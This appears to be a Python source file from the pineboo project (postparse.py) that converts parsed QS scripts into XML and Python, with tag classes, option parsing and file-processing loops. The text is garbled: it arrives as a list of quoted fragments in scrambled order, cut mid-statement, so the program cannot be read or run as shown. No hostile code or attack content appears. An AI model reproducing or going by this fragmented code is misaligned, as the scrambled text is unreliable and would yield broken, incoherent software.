"to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False,",
"pathname, description) result = True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name)",
"[\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\",",
"nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname",
"True set_child_argn = False @classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self,",
"else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return",
"= False debug_other = False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn,",
"not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs",
"\"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if vtype",
"and write XML file . . .\") try: execute(options, args) except Exception: print(\"Error",
"print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename",
"errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si",
"tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject):",
"qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\") (options,",
"tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"]",
"[\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags",
"sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%) \\r\" % (bname, 100.0",
"se pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent)",
"[x for x in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) >",
"%r no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s .",
"= fn return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if",
"Test PY file load . . .\") options.topython = False try: execute( options,",
"options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full",
"print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path): self.name = name",
"= \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist',",
"(bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr =",
"subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"]",
"None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for",
"tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0",
"prog: print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"]",
"TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value): if argn == self.type_arg:",
"= [\"optvartype\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self",
"argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags =",
"bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . . .",
"[\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self):",
"prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue",
"adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class",
"== 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other =",
"\"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\",",
"True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result = False except",
"= etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values = [] if self.name_is_first_id:",
"self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname",
"+ \".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython:",
"if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value))",
"args = [x for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))",
"= destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue",
"[\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject):",
"except Exception as e: print(traceback.format_exc()) result = False if fp: fp.close() return result",
"<reponame>Miguel-J/pineboo-buscar<filename>pineboolib/flparser/postparse.py<gh_stars>0 #!/usr/bin/python from builtins import str from builtins import object from optparse import",
"\"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone =",
"regenerate it\") (options, args) = parser.parse_args(argv) return (options, args) def main(): options, args",
"description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname =",
"value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def add_other(self, argn,",
"post_parse(tree_data) if ast is None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename)))",
"= os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description",
"class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname =",
"[\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags",
"if not tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue ast",
"filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options, args)",
"[\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if",
"object from optparse import OptionParser import os import os.path import sys import imp",
"class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values)",
"argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags",
"n in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname, treedata):",
"tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data)",
"= [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class",
"= os.path.join(options.storepath, bname + \".py\") else: destname = filename + \".py\" destname =",
"parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots",
"tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"]",
"subelem): return def is_in(self, listobj): return self.__class__ in listobj or self.astname in listobj",
"str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", '\"')",
"no hace falta calcular mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog,",
"KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for",
"not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args)",
"def execute(options, args): if options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python",
"\"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags",
"default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in",
"description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result = True except",
"print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s \\n\" % (repr(filename))) continue",
"1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return",
"tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return",
"----------------- def create_xml(tagname): classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj",
"for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib:",
"vtype == \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\",",
"class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags =",
"self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\",",
"return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is None:",
"%-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no se",
"for x in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x",
"tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types",
"self.xmlname = None self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\")",
"def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\": return",
"results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\",",
"if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . . (%.1f%%) \\r\" %",
"listobj or self.astname in listobj def get(self, listobj, default=None): if self.__class__ in listobj:",
"[\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # -----",
"= [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class",
"if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) ==",
"= None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if",
"% filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File: %-35s . . . .",
"os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename in enumerate(args): bname =",
"execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True",
"['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject):",
"file exists, don't regenerate it\") (options, args) = parser.parse_args(argv) return (options, args) def",
"== \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype ==",
"not prog: print(\"Error: No se pudo abrir %-35s \\n\" % (repr(filename))) continue if",
"= [\"expression\"] # adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0 and",
"len(self.values) == 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag",
"self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def",
"100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent =",
"= None self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def",
"= options.exec_python options.exec_python = False options.full = False options.toxml = True if options.verbose:",
"destname = os.path.join(options.storepath, bname + \".xml\") else: destname = filename + \".xml\" f1",
"self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def",
"self.astname = \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list']",
"def pythonify(filelist): options, args = parseArgs([]) options.full = True if isinstance(filelist, str): filelist",
"and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject):",
"repr(filename))) continue if not options.toxml: # Si no se quiere guardar resultado, no",
"\"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn):",
"\"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases, dct):",
"self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def",
"polish(self): # if len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) #",
"if len(text) > 2: print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines()))",
"if tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return",
"import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS",
"self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype,",
"default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname]",
"result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print",
"\"Pythonizing File: %-35s . . . . (%.1f%%) \\r\" % (bname, 100.0 *",
"tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS,",
"convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test",
"= False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args])",
"0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags =",
"vtype == \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype = \"Number\"",
"= False except Exception as e: print(traceback.format_exc()) result = False if fp: fp.close()",
"in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return",
"[\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject):",
"parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate it\") (options, args)",
"%r no encontrado\" % self.name) result = False except Exception as e: print(traceback.format_exc())",
"= True if options.verbose: print(\"Pass 1 - Parse and write XML file .",
"parseArgs([]) options.full = True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist)",
"tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"]",
"class Module(object): def __init__(self, name, path): self.name = name self.path = path def",
"import os.path import sys import imp import traceback from lxml import etree try:",
"Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"]",
"execute(options, [arg + \".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc())",
"= [x for x in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x)",
"False options.full = False options.toxml = True if options.verbose: print(\"Pass 1 - Parse",
"for k, v in treedata['content']: if type(v) is dict: instruction = parse(k, v)",
"action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If",
"name) elif options.topython: from .pytnyzer import pythonize import io if options.cache: args =",
"return tagname @classmethod def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj",
"% bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args = [x",
"# return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy()",
"nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.storepath:",
"os import os.path import sys import imp import traceback from lxml import etree",
"value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"]",
"tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value):",
"\"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject):",
"self.xmlname is None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"]",
"[\"updateoperator\"] # ----- keep this one at the end. class Unknown(TagObject): promote_child_if_alone =",
"pythonize(filename, destname, destname + \".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename)",
"tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = []",
"for x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) >",
"= False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\",",
"adopt_childs_tags = ['base_expression'] def polish(self): if len(self.values) == 0 and len(self.subelems) == 1:",
"Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class",
"(nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream =",
"USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS",
"False class NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id =",
"[\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"]",
"%-35s . . . . (%.1f%%) \\r\" % (bname, 100.0 * (nf +",
"False options.toxml = True if options.verbose: print(\"Pass 1 - Parse and write XML",
"vtype + \":\" + repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\"",
"in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj is None: return",
"self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"] class Condition(ListObject): tags = [\"condition\"] class",
"* (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream",
"== 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\"",
"self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags",
"UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames:",
"value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\"",
"\"String\" value = value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\"",
"traceback from lxml import etree try: from pineboolib.flparser import flscriptparse except ImportError: import",
"except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype",
"qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\",",
"self.path = path def loadModule(self): fp = None try: description = ('.py', 'U',",
"write XML file . . .\") try: execute(options, args) except Exception: print(\"Error parseando:\")",
"value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) ==",
"tagname @classmethod def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj =",
"self.xmlname is None: self.astname = \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"]",
"= False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"]",
"tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem):",
"return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other = False class",
"pythonize import io if options.cache: args = [x for x in args if",
"instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v)",
"if options.verbose: print(\"Pass 3 - Test PY file load . . .\") options.topython",
"InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other",
"e: print(traceback.format_exc()) result = False if fp: fp.close() return result def parseArgs(argv): parser",
"[\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other =",
"add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags",
"'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname",
"e: print(\"Error: No se pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue",
"vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value):",
"TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags =",
"if vtype == \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype =",
"self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags =",
"tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags =",
"decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def",
"= False debug_other = True adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem =",
"tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject):",
"fp = None try: description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc',",
"ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg",
"fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module",
"continue ast = post_parse(tree_data) if ast is None: print(\"No se pudo analizar %-35s",
"= tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values =",
"return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't",
"options.verbose: print(\"Pass 3 - Test PY file load . . .\") options.topython =",
"enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . . .",
"ForIncrement(ListObject): tags = [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags =",
"se pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname = os.path.join(options.storepath,",
"v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k,",
"= True set_child_argn = False @classmethod def tagname(self, tagname): return tagname @classmethod def",
"print(\"Error: No se pudo abrir fichero %-35s \\n\" % (repr(filename)), e) continue prog",
"[\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject):",
"# fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result",
"\\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast is None: print(\"No se",
"help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from",
"etree try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\")",
"tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"]",
"\"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\":",
"ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags =",
"\"\") def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn))",
"= [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject):",
"omit_subelem(self, argn, subelem): return def is_in(self, listobj): return self.__class__ in listobj or self.astname",
"debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class",
"File: %-35s . . . . (%.1f%%) \" % (bname, 100.0 * (nf",
"def create_xml(tagname): classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj =",
"print(\"Error cargando modulo %s\" % name) elif options.topython: from .pytnyzer import pythonize import",
"= ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self):",
"in self.tags def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname =",
"self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn,",
"# if len(self.values) == 0 and len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return",
"= [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def",
"= [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if argn ==",
"tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags = ['base_expression'] def",
"os.path.join(options.storepath, bname + \".py\") else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\",",
"adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list']",
"len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject):",
"def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator",
"self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject):",
"tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname",
"destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero",
"print(traceback.format_exc()) print(\"Done.\") elif options.exec_python: # import qsatype for filename in args: realpath =",
"default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return",
"\\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml: # Si no se quiere",
"= cls break if classobj is None: return None return classobj(tagname) def parse_unknown(tagname,",
"self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self,",
"[\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self",
"return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls,",
"for n in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname,",
"len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag =",
"args = parseArgs([]) options.full = True if isinstance(filelist, str): filelist = [filelist] execute(options,",
"debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other =",
"is None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i",
"\"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\":",
